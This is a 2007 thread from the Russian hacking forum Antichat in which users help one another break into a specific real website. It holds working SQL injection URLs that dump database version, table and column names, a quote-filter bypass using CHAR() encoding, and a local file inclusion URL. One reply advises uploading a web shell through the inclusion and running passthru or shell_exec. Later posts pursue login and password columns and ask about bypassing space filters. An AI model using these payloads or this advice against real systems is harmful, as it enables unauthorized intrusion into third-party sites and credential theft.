ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.09.2007, 19:27
|
|
Познающий
Регистрация: 13.08.2007
Сообщений: 37
Провел на форуме:
232729
Репутация:
1
|
|
Осталась ещё одна проблемка. Кто сможет вывести данные? Там фильтруеться знак ;
Другими способами тоже не получилось.
|
|
|
13.09.2007, 04:05
|
|
Новичок
Регистрация: 02.06.2006
Сообщений: 20
Провел на форуме:
217292
Репутация:
13
|
|
Народ подскажите что делать дальшо (вроде inj и даже inc нашол но нормально ковырнуть неполучаеццо) ...
inj1 _http://www.att.su/obves_kat/index.php?cat=22222+union+select+1,version(),3,4,5 /*&sub_cat=224&p=1'/*
inj2 _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,database(),u ser(),5/*&p=1'/*
локальный инклуд _http://www.att.su/alessio_wheels/index.php?disk=./../../index
Табличку подобрать никак неполучаеццо.. да и заинклудить чтонить стоящее тоже...
И кста есть ли какойнить софтег/скриптег для автоматического подбора таблиц, а также имеюццо-ли способы узнать имя таблички без перебора?
*добавлено*
Всю ночь я возился с этим сайтом... выдрал все имена таблиц посредствам такой конструкции...
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name ,5+from+information_schema.tables+limit+73,1/
Но мля, из табличек ничего нечитается... что делать???
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me='g2_User'/*
Такой запрос выдаёт "Query failed"
Версия сервака: 5.0.24a-log
Юзер и хост: att_su@localhost
название бд: att_su
Таблички
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
KEN_categories
KEN_detal
KEN_picture
KEN_products
SS_categories
SS_detal
SS_picture
SS_products
SS_subcategories
cesp_expand
cesp_prebuild
g2_AccessMap
g2_AccessSubscriberMap
g2_AlbumItem
g2_AnimationItem
g2_CacheMap
g2_ChildEntity
g2_Comment
g2_DataItem
g2_Derivative
g2_DerivativeImage
g2_DerivativePrefsMap
g2_DescendentCountsMap
g2_Entity
g2_ExternalIdMap
g2_FactoryMap
g2_FailedLoginsMap
g2_FileSystemEntity
g2_Group
g2_ImageBlockCacheMap
g2_ImageBlockDisabledMap
g2_Item
g2_ItemAttributesMap
g2_Lock
g2_MaintenanceMap
g2_MovieItem
g2_PermalinksMap
g2_PermissionSetMap
g2_PhotoItem
g2_PluginMap
g2_PluginPackageMap
g2_PluginParameterMap
g2_RecoverPasswordMap
g2_RssMap
g2_Schema
g2_SequenceId
g2_SequenceLock
g2_SessionMap
g2_TkOperatnMap
g2_TkOperatnMimeTypeMap
g2_TkOperatnParameterMap
g2_TkPropertyMap
g2_TkPropertyMimeTypeMap
g2_UnknownItem
g2_User
g2_UserGroupMap
g2_WatermarkImage
Умные люди, подскажите как можно поступить в такой ситуации?
Последний раз редактировалось of69; 13.09.2007 в 08:05..
|
|
|
|
13.09.2007, 08:31
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
1) Кавычек не надо.
2) Переводи в hex или char выделенный кусок.
И иньекций у тебя не 2, а одна.
|
|
|
|
13.09.2007, 08:59
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Все выводиться, вот запрос
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)/*
Кавычки вообщето нужны обязательно, но в данном случае у нас фильтруються кавычки, потому делаем CHAR(103,50,95,85,115,101,114) что равно g2_User - без кавычек.
Во блин, а вывод из таблиц не смог выполнить... та же ошибка в запросе 
Последний раз редактировалось Red_Red1; 13.09.2007 в 09:28..
|
|
|
|
13.09.2007, 10:16
|
|
Новичок
Регистрация: 02.06.2006
Сообщений: 20
Провел на форуме:
217292
Репутация:
13
|
|
Спасибо огромное, всё выводится, просто руки у меня кривые - я непрально скопировал, с пробелом в name...
http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me=CHAR(103,50,95,85,115,101,114)/*
подскжите плз утилитку для перевода в CHAR ? :-)))
|
|
|
|
13.09.2007, 10:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
someshit.net/tools/char.php
someshit.net/tools/encoder.php
по мне удобней хексить \=
а вообще на твоем месте я бы залил шелл через инклуд.. быстрее и удобней
updated
ЗЫ magic quotes 1, не получится через него залить ))
ya_mag
пробуй разные системные ф-ии
passthru($cmd)
shell_exec($cmd)
и тд, т.к. возможен safe_mod с disable ф-ии system
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 13.09.2007 в 10:22..
|
|
|
|
14.09.2007, 00:11
|
|
Новичок
Регистрация: 13.09.2007
Сообщений: 5
Провел на форуме:
23346
Репутация:
3
|
|
Доброго времени суток.
Такой вопрос, есть ли способ осуществить SQL-injection, на сайте где работы с БД используется Parameterized Input и Stored Procedures ?
Т.е. данные от пользователя сначала заносяться в специальный объект например:
parameter = new SqlParameter("name", SqlDbType.VarChar);
parameter.Value = txtUserInput.Text;
При этом они проверяются на тип/размер. А после передаются в stored procedure.
Спасибо.
Последний раз редактировалось unit171; 14.09.2007 в 02:03..
|
|
|
|
16.09.2007, 12:58
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
Есть форма. При подcтановке в поле user ', вылетает ошибка синтаксиса.
Url имеет следующий вид:
Код:
...php?username=%27&credit=1&unit=false&submit=%D0%9F%...
т.к. поле для имени пользователя, то пробелы фильтруются, пробую обойти
Код:
...php?username=-1/**/order/**/by/**/1/*&credit=1&unit=false&submit=%D0%9F%...
получаю туже форму, нормально, идем дальше, увеличил запрос на 20, та же форма, на 30, с дуру прописал 8888, все та же форма и без ошибки. Можно с этим что то сделать? |
|
|
|
16.09.2007, 23:01
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
прива всем такая ситуация.. я нашел что на сайте есть таблицы users а там колумны login и password такая фигня я ввожу запрос
id=-1+union+select+1,login,3,4+from+users+limit+1,1/*
послаю запрос он мне выводит
Table 'pincode.user' doesn't exist
я бы еще согласился если бы там было
Table 'user' doesn't exist
но причем тут pincode.user
что предложите ???
|
|
|
|
16.09.2007, 23:04
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
это имя базы, если ты работаешь с 5 веткой, то посмотри параметр table_schema.
Таблица user может существовать но в другой базе, обратишся к ней в форме имя_базы.user
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
